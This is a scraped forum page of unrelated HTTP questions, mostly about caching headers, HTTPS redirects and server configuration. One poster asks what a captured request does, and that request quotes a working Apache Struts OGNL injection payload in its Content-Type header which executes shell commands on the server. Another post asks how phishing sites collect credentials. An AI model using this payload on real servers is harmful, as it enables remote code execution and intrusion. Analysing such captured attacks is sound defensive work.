HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Share tech news, updates, or what's on your mind.

Sign up to Post

Hi Experts

I am working on a wagtail project(like django-cms) I get this error when I run python3 runserver

code 400, message Bad request syntax 
  You're accessing the development server over HTTPS, but it only supports 

Open in new window

I had changed SECURE_SSL_REDIRECT=FALSE and tested it still i get this same error. I had disabled cache in chrome.

 I had deactivated chorme caching in registry  by following steps.
Deactivate Chrome Cache in the Registry

Open Registry (Start -> Command -> Regedit)

Search for: HKEY_CLASSES_ROOT\ChromeHTML\shell\open\command

Change the part after ...chrom.exe" to this value: –disable-application- cache –media-cache-size=1 –disk-cache-size=1 — "%1"

Example: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" - disable-application-cache –media-cache-size=1 –disk-cache-size=1 — "%1"

I had also tried disable cache from chrome developer tools network -disable cache.

I had also tried by clearing cache from hsts on chrome.

I had also tried from incognito window on chrome. But still I get the same error

It is an Ubuntu machine on AWS(accessed by putty from windows pc).

I access from outside (windows pc - local pc )through http://54.23x.9x.17:8000 I am not able to resolve this error.

I had tried on some other machine.  I got the following error on console for Linux Ubuntu

it is changing to https instead of http and I got "GET / HTTP/1.1" 301 0 on console window

Please help me in resolving this error.

With Many Thanks, Bharath AK
Upgrade your Question Security!
LVL 12
Upgrade your Question Security!

Your question, your audience. Choose who sees your identity—and your question—with question security.

In Android 6.0, using SDK 25, should be obeying the system properties http.keepAlive and http.maxConnections?

With netstat, I can verify that in the system there are 2 TCP connections continuously open to my server. These connections appear to be neatly reused for HTTP keep alive and they appear when I start the player, disappear when I stop the player. I am using ExoPlayer for live dash streaming (player is downloading approx 3-5 files every 10 seconds from the same server, audio chunk, video chunk and manifest).

But the underlying system seems to ignore the http.maxConnections (and even http.keepAlive) that I wish to control.

My goal is to set http.maxConnections to 1 and ensure there is exactly 1 HTTP keep alive (TCP) connection open to the server. Any way to accomplish this?

Generally, the pre-check directive is very similar to max-age. However, IE's implementation of max-age takes the Age response header into account. In contrast, the implementation of post-check and pre-check do not. Hence, pre-check is equivalent to max-age only when there is no Age header on the response.

This article is from 2009, so pretty old. How max-age and the Age header are related nowawdays? Or are they not related at all anymore?
hi guys,

i'm looking for a way to force squid to prevent squid from issuing valid html answers when it encounters an error condition.
namely i do not want an idiotic html page stating the squid proxy is shutting down when i'm synchronizing a bunch of shell scripts programatically.
i want squid to issue a 4xx/5xx error instead, or possibly reject the connection or just don't respond ( by order of preference ).

is that achievable ?


if not, i'm interested in an alternate SIMPLE proxy

caveat is i'm limited to either debian packages or something i can bundle easily.

i've already ruled out or experimented with the following candidates
- tinyproxy : awfully bugged. initially most likely a good program though.
- a custom perl script based on http::proxy : works fine but keeps unread data in it's buffers and prepends them to a different query. i have no idea how to instruct http::proxy to instruct net::server to just trash the worker thread entirely... and this produces random errors.
- ffproxy : cannot disable the connect method
- apache is way too heavy ( even worse than squid which i actually did not want to use )
- lighttpd does not do forward proxying
- i'd rather not use nginx for this task because of the complexity of embedding code in the config and actually entirely different reasons which are too long to state here. anyway it's obviously not meant for the job.
- i cannot use anything with too many dependencies. python is clearly a no-go

My question is about one specific reason to use max-age over Expires.

See for example:
Although the Expires header is useful, it has some limitations. First, because there’s a date involved, the clocks on the Web server and the cache must be synchronised; if they have a different idea of the time, the intended results won’t be achieved, and caches might wrongly consider stale content as fresh.

But with max-age you also have the exact same problem, right? In my opinion there are 2 possibilities:

1. A cache receives a response from a server. The cache's clock starts counting from that moment. If there would be a delay between the server sending the response, and the cache receiving the response, then the age would be incorrect. So this is not a good way to calculate the age.

2. A cache receives a response from a server. The age of the response is calculated as a difference between the cache's current date and the Date general header included in the HTTP response.

Case 2 is in my opinion the right way to calculate the age of the response. But the reponse header field "Date" will be determined by the server. Just like "Expires" will be determined by the server. So in both cases the server's clock will be compared with the cache's clock. So in this respect (clock synchronization), I see no difference between max-age and Expires?

With case 1 they would be right, because then the cache's clock on moment A …
When a stored response is used to satisfy a request without validation, my browser is not showing me the HTTP reponse header field: "Age"?

Just take a simple test.html file, which is chacheable by default. Now visit the page 2 times, so the second time the file is shown directly from cache without validation.

Firefox shows me response headers like this:

Date: Mon, 12 Mar 2018 16:05:18 GMT
Server: Apache/2.4.17 (Unix) OpenSSL/1.0.1e-fips PHP/5.6.16
Last-Modified: Mon, 12 Mar 2018 12:24:12 GMT
Accept-Ranges: bytes
Content-Length: 143
Content-Type: text/html

Open in new window

But why Firefox does not show me the "Age" header field?


When a stored response is used to satisfy a request without validation, a cache MUST generate an Age header field

And see:

However, lack of an Age header field does not imply the origin was contacted, since the response might have been received from an HTTP/1.0 cache that does not implement Age.

A browser's cache is not HTTP/1.0, so the response headers must contain an Age header field. Firefox is not showing me "Age"?

Are browsers only showing the response and request headers of the server? But if that's the case then they had to show no response headers at all, because there was no response from server in case of "200 OK (cached)"?

So I don't understand this? What's the logic behind this?

P.S. The example was about Firefox, but for example Chrome is doing the same.

PHP is using:

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Open in new window

I don't understand this 100%. A cache could have a different idea about time. Although it's really rare, a cache could think it's 1980. In a case like that, the cached copy will be seen as fresh.

When using:

Expires: 0

Open in new window

you can avoid problems like that. So in my opinion PHP is choosing the second best solution instead of the best solution.


A cache recipient MUST interpret invalid date formats, especially the
value "0", as representing a time in the past (i.e., "already

So when using the value "0", you know for sure it will be seen as a date in the past. But this is the protocol for HTTP/1.1 (not HTTP/1.0).

I was also searching for some information about HTTP/1.0 and invalid dates, but I could not find an answer. I know HTTP/1.0 CAN implement things from HTTP/1.1.

How HTTP/1.0 caches are dealing with invalide dates? And can I be sure that in all situations "Expires: 0" will be seen as a date in the past? And if no, do you have examples?

I saw Google is using:

Expires: -1

Open in new window

In the past people were setting Expires via html via the meta tag ... in cases like that "-1" could mean something different than "0", but in what kind of situations "Expires: -1" means something different than "Expires: 0" in the http headers?

So what to use? Date in the past, 0 or -1?
I'm trying to understand:

Vary: Accept-Encoding

Open in new window

Let's say we have:

- client 1 (only understands gzip-encoding)
- client 2 (only understands deflate-encoding)
- a shared cache
- a server (supports gzip and deflate encoding / compression, so the server can send the response message body encoded / compressed)
- a resource (1 url, cacheable)

If client 1 first will make a request to the resource, then the response will be stored in cache. The resource is gzip-encoded. If now client 2 will make a request, then the cache will server the gzip-encoded version which client 2 does not understand.

This is what I understand about it from the internet. But this sounds weird to me.

1. The stored reponse in cache must contain: "Content-Encoding: gzip", because when a server will send an encoded response, it will let you know which encoding has been used. So if I would be a cache and I would get a request with "Accept-Encoding: deflate" (or with an empty value). As a cache I know that my stored response is gzip-encoded (because of the stored "Content-Encoding: gzip"). Then I don't need no "Vary: Accept-Encoding" to know that I have to make a new request to the server??

So why "Vary: Accept-Encoding" exists anyway and in what kind of situations it really makes a difference?

2. Are there also caches around, which can decode / encode (gzip / deflate)? In cases like there is also no need to add "Vary: Accept-Encoding", because a cache could decode …
If you have for exampe an image with max-age=31536000, when using HTTPS what is the best to do:

Cache-Control: public, max-age=31536000

Open in new window

Cache-Control: private, max-age=31536000

Open in new window

Cache-Control: max-age=31536000

Open in new window

Which one and why?

I also did some own research, but I'm not sure yet what the answer has to be. I think this is true:

By default web browsers should cache content over HTTPS the same as over HTTP, unless explicitly told otherwise via the HTTP Headers received.

This is about the cache of the browser. For shared caches I think this is true:

If the request is authenticated or secure (i.e., HTTPS), it won’t be cached by shared caches.

Google is saying here, see:

If the response is marked as "public", then it can be cached, even if it has HTTP authentication associated with it, and even when the response status code isn't normally cacheable. Most of the time, "public" isn't necessary, because explicit caching information (like "max-age") indicates that the response is cacheable anyway.

That's what Google is saying, but I also checked what they are doing. See:

cache-control:private, max-age=31536000

Open in new window

cache-control:public, max-age=31536000

Open in new window

Reponse headers can contain something like:

Cache-Control: must-revalidate

Open in new window

But "must-revalidate" does not exist for the request headers, see:

Why? Is there a reason behind this?

Take for example me, my browser, my browser's cache and the origin server. Let's say there is a stale cached copy in the browser's cache. Imagine I don't want the cached copy to be served without making any request to the server. Also not if the cache is disconnected from the origin server. I could add must-revalidate in the request headers, but this only exists for the response headers in similar situations.

Why is that and what's behind it? Directives like max-age, no-cache, no-store you have for the response AND the request directives, so why must-revalidate is an exception to that?
Free Tool: IP Lookup
LVL 12
Free Tool: IP Lookup

Get more info about an IP address or domain name, such as organization, abuse contacts and geolocation.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Let's first take a look at the definitions.

1. Max-age in request headers:

The "max-age" request directive indicates that the client is
unwilling to accept a response whose age is greater than the
specified number of seconds.  Unless the max-stale request directive
is also present, the client is not willing to accept a stale

2. Max-age in the response headers:

The "max-age" response directive indicates that the response is to be
considered stale after its age is greater than the specified number
of seconds.

And see:

A cache MUST NOT send stale responses unless it is disconnected
(i.e., it cannot contact the origin server or otherwise find a
forward path)

So is it true that "max-age=0" in the response headers is NOT equivalent to "no-cache" in the reponse headers (because of case disconnected), BUT "max-age=0" in the request headers IS equivalent to "no-cache" in the reponse headers?

3. No-cache in the request headers:

The "no-cache" request directive indicates that a cache MUST NOT use
a stored response to satisfy the request without successful
validation on the origin server.

4. No-cache in the response headers:
Dear sirs,
I am setting up a global exception handler in Spring. Once an exception is caught, a method in the @ControllerAdvice is called in, and returns a specific view with exception details. Among info returned with the view, I have the HttpStatus, that can get. Actually I keep getting 200, while the right HttpStatus should be 500, 404, etc.
Here is my code
public class AppGlobalExceptionHandler {
       * Note: You can either point to Exception Types or Http ResponseStatus
       * @ExceptionHandler({MyException.class})
       * public String ...
       * @ExceptionHandler
       * @ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR)
       * public String
       * */
      public String handleAnyException(Exception exception, Model model,
                  HttpServletRequest request, HttpServletResponse response) {
            log.error("Request raised " + exception.getClass().getSimpleName());
            String details = ExceptionUtils.getStackTrace(exception);
            AppError error = new AppError();
            model.addAttribute(AppStringHandler.VARIABLE_URL_SUBMIT, AppStringHandler.URL_TASKS_SEND_EMAIL_500);
            model.addAttribute(AppStringHandler.VARIABLE_URL_REDIRECT, AppStringHandler.URL_ADMIN_REDIRECT);
            model.addAttribute(AppStringHandler.VIEW_ERROR_MODEL_ATTRIBUTE, error);
Our mobile app is experiencing a strange behavior in a place where they have WiFi. If the app uses THAT WiFi there's an HTTP POST request (to our API) that gets the response content truncated randomly (not always truncated, and if truncated not always at the same place).

I made several tests at that place (using the app and also Postman) and found that on mobile data the response always comes OK, but when connecting with that WiFi the response sometimes gets truncated. Also, I saw that other API requests get the response correctly, even when the content length is 10 times bigger (I thought that maybe the response was too big, but we're talking about just 10Kb).

The failing request is a regular POST request sent to a REST API made with Dropwizard. The request gets processed correctly on the server, which returns status 200 and the content. The client gets the status 200 but the content is truncated, so the whole operation can't be finished.

I wonder if there's something wrong with that WiFi, or if this kind of response errors must be expected and dealt by our application. I haven't seen this behavior before.
I want to create an IIS URL rewrite rule which should make the site to respond with the same content on any request. This rule is to be applied when the site goes under a maintenance.
My rule looks like the following:
                <rule name="Stub" enabled="true" patternSyntax="ECMAScript" stopProcessing="true">
                    <match url=".*" />
                    <action type="Rewrite" url="/maintenance.htm?URL={R:0}" appendQueryString="true" logRewrittenUrl="true" />
                        <add input="{REMOTE_ADDR}" pattern="" negate="true" />
                        <add input="{REMOTE_ADDR}" pattern="172.31.3" negate="true" />

Open in new window

It works perfectly for any request to resources in the root folder. But on any request to a sub-directory the server responds with 403 Forbidden

For example, a request like correctly returns the content of the file maintenance.htm (located in the site's root folder), but a request like  returns
 <h2>403 - Forbidden: Access is denied.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>

Open in new window

(there is a file /2/s.gif and it is correctly returned when the rule is disabled).
In the W3SVC log file I can see:
2017-12-20 22:01:36 GET /maintenance.htm URL=2/s.gif 443 - Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Sea-Monkey/2.49.1+(similar+to+Firefox/52.0) - 403 18 0 78

Open in new window

Please help.
My question is about:

They're saying:

The problem with that line of reasoning is that HTTP versions aren’t black and white like this; just because something advertises itself as HTTP/1.0, doesn’t mean it doesn’t understand HTTP/1.1 (see RFC2145 for more).

But here they are saying:

If a response includes both an Expires header and a max-age directive, the max-age directive overrides the Expires header, even if the Expires header is more restrictive. This rule allows an origin server to provide, for a given response, a longer expiration time to an HTTP/1.1 (or later) cache than to an HTTP/1.0 cache.

So or the article is incorrect, or W3 is incorrect (or I'm wrong :p). With the last sentence, W3 means you can give a different expiration time to a HTTP/1.1 cache (or later), compared with a HTTP/1.0 cache. You can do this by using max-age and the Expires header.
So they can only say something like that, by assuming the HTTP/1.0 cache will ignore the max-age, because otherwise you will just have the same expiration time for all the caches (HTTP/1.0 and HTTP/1.1 et cetera).

So what is true about HTTP/1.0 caches understanding max-age?

In this sample GET request

GET / HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Connection: Keep-Alive

The content-type begins with something that is not normal. Is it trying to get the webserver to process it and execute something?  I also see java.lang so it is trying to call a java function.   What is it trying to do with java?

What is it doing with the command prompt and shell bash command prompt?

What is the purpose of echoing STRUSTS2045?
This is a great video (however the links no longer work):
I need a real life example of IF someone clicks on a bad link via email or whatever avenue how the redirected website collects their credentials. Anyone have any good ones?

Hello , does anyone knwo how to transfer iPhone contacts and messages to Android phone without any loss ? i've tried many ways to transfer them , but always fail ,and i don't how to connect the differen operation phones ,
how can I disable HTTPS and enable HTTP on apache Tomcat?
Based on my researches I have to modify the server.xml in the root folder of apache tomcat. Must I modify the connector? how?
For my Webapplication I'm connecting to the port 8443
<?xml version='1.0' encoding='utf-8'?>
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  See the License for the specific language governing permissions and
  limitations under the License.
<!-- Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" at this level.
     Documentation at /docs/config/server.html
<Server port="-1" shutdown="SHUTDOWN">
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="" />
  <!--APR library loader. Documentation at 

Open in new window

Free Tool: Subnet Calculator
LVL 12
Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

How to display html detail when clicking submipls
In internet explorer i am able to access a https site and download a file. i have to use an username and password to access the site first.
However, when i enter the URL and credentials in SSIS using the HTTP connection managerand press the test connection button,  i get the message:

The remote server returned an error: (401) Unauthorized.

Any ideas why this is happening. The username and password are correct.

Can i use an https site in a http connection?

Any help appreciated.

I have used 3 set of codes(where I used Indy10.6.2 component), which doesn't show any errors, but i can't able to send SMS through the code. Please help me to send me the Sms through Delphi code

The code which I used is...

  URL = '****&hash=****&sender=TXTLCL&numbers=9198........&message=HISUNDAR';
  //URL = '*****&hash=******&sender=TXTLCL&numbers=9198...&message=HISUNDAR';
  ResponseSize = 1024;
  hSession, hURL: HInternet;
  Request: String;
  ResponseLength: Cardinal;
  hSession := InternetOpen('TEST', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
    Request := Format(URL,[Username,Password,Sender,Numbers,HttpEncode(Message1)]);
    hURL := InternetOpenURL(hSession, PChar(Request), nil, 0,0,0);
      SetLength(Result, ResponseSize);
      InternetReadFile(hURL, PChar(Result), ResponseSize, ResponseLength);
      SetLength(Result, ResponseLength);

http : TIdHTTP;
IdSSL : TIdSSLIOHandlerSocketOpenSSL;
 http := TIdHTTP.Create(nil);
 IdSSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
  Http.ReadTimeout := 30000;
  Http.IOHandler := IdSSL;
  IdSSL.SSLOptions.Method := sslvTLSv1;
  Http.Request.BasicAuthentication := True;
 // IdSSL.SSLOptions.Method := sslvTLSv1;
I am using the following query to get the CNAME record to load my site properly. The issue: The code below works ... but only if refreshed a couple of times.

Query ::

$recsDNS = dns_get_record($_SERVER['HTTP_HOST'], DNS_CNAME );

Not getting CNAME records Properly, SOme times coming and some times Not.

If I use DNS_ALL :: After refreshing 3 to 4 times i am getting CNAME records.
I had this question after viewing XP driver for Iomega Zip with USB-to-serial converter.

Does this driver help you?
The second download button.

That download was only basically a blank file.

Is there some other way to get an original driver as all leads I have found are for updates.

Thank you,
Hello all,

My site was working fine under the regular http site.  When i was force to move over to secure https site, ajax stop working.  I don't know what i am doing wrong.

the code is below:
				type: "POST",
				url: "update_location.php",
				success: function(data){

Open in new window


HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Top Experts In
HTTP Protocol